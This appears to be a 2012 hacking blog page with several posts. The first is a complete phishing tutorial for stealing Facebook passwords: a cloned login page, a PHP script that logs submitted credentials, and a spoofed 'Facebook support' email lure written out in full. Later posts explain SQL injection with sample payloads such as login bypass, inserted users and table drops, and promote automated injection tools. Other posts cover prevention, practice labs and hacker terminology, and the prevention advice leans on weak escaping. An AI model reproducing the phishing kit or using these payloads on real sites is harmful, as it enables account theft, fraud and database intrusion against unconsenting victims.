Sunday, June 17, 2012

How To Hack Any Website like facebook ,orkut | Phishing


In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.

action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with

action= “mail.php”

Now open notepad type following code in it and create mail.php.

Code:


<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website createFacebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.


Sub: Invalid activity on your facebook account

Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

Sunday, June 17, 2012 by Unknown · 0

What is Blind Sql Injection ? Web Application Vulnerability Tutorial


Blind SQL injectiontechnique is used when the web application is vulnerable but the output doesn’t display to the attacker. When hacker tries SQL injection, they will redirect to some other pages instead of error message. Blind SQL Injection is harder to implement when compared with the above Traditional SQL Injection Technique, it will take more time . There are some tools for Blind SQL Injection.


Blind SQL injection can be done by querying the database with sequence of true/false questions.

How to detect the Blind SQL Injection Vulnerability?
Web application gets the clients input and supplied in where clause to retrieve data from Database. For instance, let us say the web application gets id and supplied to the sql query as follows
Statement=”select * from userinfo where id=` “+id+” ` “;
Hope you know about where clause and compound conditions (OR, AND). OR and AND are used to combine two conditions. The attacker can find the vulnerability by entering the compound conditions as input.
For instance, the attacker can enter id value as
1 AND 1=1 
The above query will become
Select * from userinfo WHERE id=1 AND 1=1
If the page remains on the same page, then the application may be vulnerable. This type of vulnerability occurs when the developer fails to validate the data type of ID. Here we give true condition (1=1). So if use false condition (1=2), it will raise an error message. We can conclude that if the condition is true, it remains in page. If false, showing error message. 

Some Functions to be known
The following function will be useful for Blind SQL Injection. 
substring(str, pos, length) is the function that returns the part of the String. sub string of the string is depending on the argument given to the function.

For instance substring(“hello”,2,1) will returns ‘e’.  
Here string is “hello”, character position is 2 (that is ‘e’), and length is 1.

  • lower(str) is the function that converts the character to lower case
  • ascii(c) is the function that converts the character to ASCII value.
  • length(str) returns the length of the string .
  • user() returns the current user(admin)
  • database() returns the database name.
  • version() retruns the version of database

Blind Sql Injection Tools: 
When come to Blind Sql Injection vulnerability, it will time consuming process. So Automated tools are better than manual process. Here are list of Automated Tools

Meet you at our Next Article with more details about the Blind Sql Injection Attack. 

by Unknown · 0

sqlsus 0.7 released with Time-based Blind SQL injection support


Sqlsusis an open source MySQL injection and takeover tool, written in perl. It is used to test the vulnerability of web application. It uses stacked subqueries and an powerful blind injection algorithm to maximise the data gathered per web server hit.Using multithreading on top of that, sqlsus is an extremely fast database dumper, be it for inband or blind injection.


Sqlsus now supports time-based blind injection and automatically detects web server / suhosin / etc.. lentgh restrictions.

Read more »

by Unknown · 0

Havij Tool - Automatic SQL Injection Process


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Read more »

by Unknown · 0

SQL Inject Me -SQL Injection Tool to test the Vulnerability for Pen Testers

So far i have written what is sql InjectionHow to prevent SQL Injection? .  In this post, i am going to introduce a new SQLi tool for Pen Testers and Webmasters.
The tool name is SQL Inject Me.

What is SQL Inject Me?
SQL Inject Me is Mozilla addon that is used to test the SQL Injection Vulnerability of Web Application.  It reduces the workload of Manual SQL Injection Test.  This is especially designed for Pen Testers and Web Masters not for hackers.


Download it From here:
https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/
How it works?
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.

The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

by Unknown · 0

How to Prevent SQL Injection Vulnerability? Website Security

Hi webmasters and budding Pen Testers, I hope you read my article about SQL Injection. Our Aim is to provide Security, right? So here is the prevention techniques.




Use Prepared Statements:

Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.
  • In Java you can use PreparedStatement() with bind variables 
  • In .NET you can use parameterized queries, such as SqlCommand() or OleDbCommand() with bind variables
  • In PHP you can use PDO with strongly typed parameterized queries (using bindParam()).

You can use Stored Procedures also.  Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters. 

Use Less Privilege Account:
Use less privilege account for database connections.  That account should not be able to drop the able or create.  Maintain two separate accounts.

Escape user input.

This powerful function rejects the possibility of many clever techniques used by the intruders. php provides escpe string function.  Later we will discuss about the syntax. 

Assume magic quotes is always off.

When the magic_quotes_gpc variable is off, this can prevent some (but not all) SQL injection attacks. Magic quotes are not an ultimate defense and what is worse - sometimes they are off and you don't know about it. This is why it is necessary to have code for the substitution of quotes with slashes. Here is :

$username = $_POST['username'];
$password = $_POST['password'];
if (!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}
if the magic quotes is enabled , the following problem will arise:
  •  Not all data that are supplied by the user are intended for insertion into a database. They may be rendered directly to the screen, stored in a session, or previewed before saving. This can result in backslashes being added where they are not wanted and being shown to the end user. This bug often creeps into even widely used software.[7]
  •  Not all data that are supplied by the user and used in a database query are obtained directly from sources protected by magic quotes. For instance, a user-supplied value might be inserted into a database — protected by magic quotes — and later retrieved from the database and used in a subsequent database operation. The latter use is not protected by magic quotes, and a naive programmer used to relying on them may be unaware of the need to protect it explicitly.
  • Magic quotes also use the generic functionality provided by PHP's addslashes() function, which is not Unicode aware and still subject to SQL injection vulnerabilities in some multi-byte character encodings. Database-specific functions such as mysql_real_escape_string() or, where possible, prepared queries with bound parameters are preferred.[8][9]
  • While many DBMS support escaping quotes with a backslash, the standard actually calls for using another quote. Magic quotes offer no protection for databases not set up to support escaping quotes with a backslash.
  • Portability is an issue if an application is coded with the assumption that magic quotes are enabled and is then moved to a server where they are disabled, or the other way round.
  • Adding magic quotes and subsequently removing them where appropriate incurs a small but unnecessary performance overhead.
  •  Magic quotes do not protect against other common security vulnerabilities such as cross-site scripting attacks or SMTP header injection attacks.


Install patches regularly and timely.

Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerabilities patches, right after they become available.



Use automated test tools for SQL injections.

Even if you follow the above said prevention, there will be some vulnerability.  You may not notice it.  So check the vulnerability of your web application with some kind of SQLi tools. 

Try SQL inject Me tool  to test the Vulnerability of your WebSite.

See i just explained theoretically,  I didn't explain with code.  Don't worry, wait for my next post.

by Unknown · 0

What is SQL Injection? Web Application Vulnerability


WebApplication(Website) stores the information in database such as user info, admin info, and passwords. When the developer fails to handle escape characters and type, it results in vulnerable database. Hacking or accessing the database using this vulnerability is known as SQL injection.

What an attacker can do?
  • Bypassing Logins
  • Accessing secret data
  • Modifying contents of website
  • Shutting down the database server
When Database is vulnerable?
When the developer fails to validate the Inputs, this vulnerability occurs. So the application runs the query without validating client’s input.

Validation of escape characters ( ' )
The database is vulnerable when the developer input is not filtered for escape characters. For instance, assume you are getting username and password from user using the form. In order to check the username and password, you have to get the information associated with user name by the following query. 

statement=”select * from `users` where `usrnam`= ' “+username+” ' ;”;
In the above query, username is the variable which gets the user name from user as input.

The above query will retrieve the data if the username is available in database. The variable “username” gets the input from user and directly passed to the SQL statement without filtering the escape characters. Hackers can input the following code instead of username to breach the database:
' OR '1'='1
When the hackers input one of the above codes as user name, the SQL query becomes

Select * from users where username=' ' or '1'='1'

Here username=' ' is false. But '1'='1' is true. Here we used OR operator. So it is enough to one condition is true. So this will query bypass the login.
The above code can be enhanced with comment to block the rest of the statements of the query. The SQL support three different types of comments. They are /*, --, {{. So the enhanced malicious code with the comment is 

' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '
When the hackers input one of the above codes as user name, the SQL query becomes

Select * from users where username=' ' or '1'='1'--'

This query does the same. At the same time it will neglect the query behind the comment operator.
The user can do anything with database using this vulnerability. For example he can insert new user entry into the database. For Example, by giving the following input as the username:

hello'; insert into users value('us12', 'pas12'); select * from users where '1'='1';

So the above query will becomes
Select * from users where username=' hello'; insert into users value('us12', 'pas12'); select * from users where '1'='1';

This query will insert the us12 as user. At the same time it displays the list of users information.


Validation of Data Type
When the developer fails to check for the data type of input, it will arise the Vulnerability of Database. 
Let us consider this query.

Statement=”Select * from `userid` where `id`=”+inputId+”;” ;

Here Id refers a number data. But the inputId is given directly without checking for the type. So attacker can enter any type of data, he can enter a string.
For example if he input as

1; drop table `userid`;
The query will become as 
Select * from `userid` where `id`=1; drop table `userid`;

If you get the input from user and pass it directly, it causes to Vulnerability of Your Web application. Attackers can do anything with your database using this vulnerability. If he get the admin id and passwords, he is able to Deface your site. So you have to prevent from sql injection. How? Wait ..!!!wait i will post.

Here is practical Example for SQL Injection. This post is for Webmasters. They should know about the Vulnerability of your web Application to prevent hacking website. 

by Unknown · 0

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking



I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi vulnerabilities.

When i surf in the internet, i come to know about the  "Damn Vulnerable Web App (DVWA)".  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal way.

Download this web Application from here:
http://www.dvwa.co.uk/

For Installing the this application, you will need XAMPP server.

The installation procedure :


Using this application , you can also practice:

  • LFI /RFI (File Inclusion methods)
  • Command Execution
  • Upload Script
  • Login Brute Force
if you have any doubts, check their wiki page or comment here.

by Unknown · 0

Ethical Hacking Lab to Test and Learn SQL injection,XSS, CSRF Vulnerability

Hi BTS readers, so far i have gave the Web Application Pen Testing tutorials .  Now it is time to for practicing your skills in legal way. Last time , i explained about the Damn Vulnerable  Web Application(DVWA).  This time i came with different web application  that will develop your knowledge in Web App PenTesting.

Read more »

by Unknown · 1

What is hacking? Introduction to Hacking

1.originally, someone who makes furniture with an axe1. A person who enjoys exploring the details of programmable systems
and how to stretch their capabilities, as opposed to most users,
who prefer to learn only the minimum necessary.

2. One whoprograms enthusiastically (even obsessively) or who enjoys programming
rather than just theorizing about programming.

3. Aperson capable of appreciating hack value. 

4. A person who is good at programming quickly. 

5. An expert at a particular program,
or one who frequently does work using it or on it; as in ‘a
Unix hacker.’ (Definitions 1 through 5 are correlated, and people
who fit them congregate.)

6. An expert or enthusiast of any kind.
One might be an astronomy hacker, for example. 
7. One who
enjoys the intellectual challenge of creatively overcoming or circumventing
limitations. 

8. [deprecated] A malicious meddler who
tries to discover sensitive information by poking around. Hence
‘password hacker,’ ‘network hacker.’ The correct term for this
sense is cracker.

Cracker


One who breaks security on a system. Coined ca. 1985 by hackers
in defense against journalistic misuse of hacker (q.v., sense 8). An
earlier attempt to establish ‘worm’ in this sense around 1981–82
on Usenet was largely a failure.

Use of both these neologisms reflects a strong revulsion against
the theft and vandalism perpetrated by cracking rings. While it is
expected that any real hacker will have done some playful cracking
and knows many of the basic techniques, anyone past larval stage
is expected to have outgrown the desire to do so except for immediate,
benign, practical reasons (for example, if it’s necessary to get
around some security in order to get some work done).
Thus, there is far less overlap between hackerdom and crackerdom
than the mundane reader misled by sensationalistic journalism
might expect. Crackers tend to gather in small, tight-knit,
very secretive groups that have little overlap with the huge, open
poly-culture this lexicon describes; though crackers often like to
describe themselves as hackers, most true hackers consider them a
separate and lower form of life.

It’s clear that the term cracker is absolutely meant to be derogatory. One
shouldn’t take the tone too seriously though, as The Jargon File is done with a
sense of humor, and the above is said with a smile. As we can see from the
above, illegal or perhaps immoral activity is viewed with disdain by the “true
hackers,” whomever they may be. It also makes reference to cracker being a
possible intermediate step to hacker, perhaps something to be overcome.

Script Kiddie


The term script kiddie has come into vogue in recent years. The term refers to
crackers who use scripts and programs written by others to perform their intrusions.
If one is labeled a “script kiddie,” then he or she is assumed to be incapable
of producing his or her own tools and exploits, and lacks proper
understanding of exactly how the tools he or she uses work. As will be apparent
by the end of this chapter, skill and knowledge (and secondarily, ethics) are the
essential ingredients to achieving status in the minds of hackers. By definition,
a script kiddie has no skills, no knowledge, and no ethics.

Phreak


A phreak is a hacker variant, or rather, a specific species of hacker. Phreak is
short for phone phreak (freak spelled with a ph, like phone is). Phreaks are
hackers with an interest in telephones and telephone systems. Naturally, there
has been at times a tremendous amount of overlap between traditional hacker
roles and phreaks.

White Hat/Black Hat/Gray Hat

White Hat Hacker:

White Hat hackers are good guys who does the hacking for defensing.  They probably work an organization for providing security.

Black Hat Hacker

Black hat hackers are bad guys(the malicious hackers or crackers).  They usually steal the other bank information and steal the money. 
They use their skills for illegal purposes.
They are creators of viruses,malware,spyware.
They will destroy your pc.

Gray Hat Hackers


Grey hats are hackers who may work offensively or defensively, depending on the situation.
This is the dividing line between hacker and cracker. Both are powerful forces on the Internet,
and both will remain permanently. And some individuals qualify for both categories. The
existence of such individuals further clouds the division between these two groups of people.
In addition to these groups, there are self-proclaimed ethical hackers, who are interested in
hacker tools mostly from a curiosity standpoint. They may want to highlight security problems
in a system or educate victims so they secure their systems properly. These hackers are
doing their “victims” a favor. For instance, if a weakness is discovered in a service offered by
an investment bank, the hacker is doing the bank a favor by giving the bank a chance to rectify
the vulnerability.

by Unknown · 0

My Headlines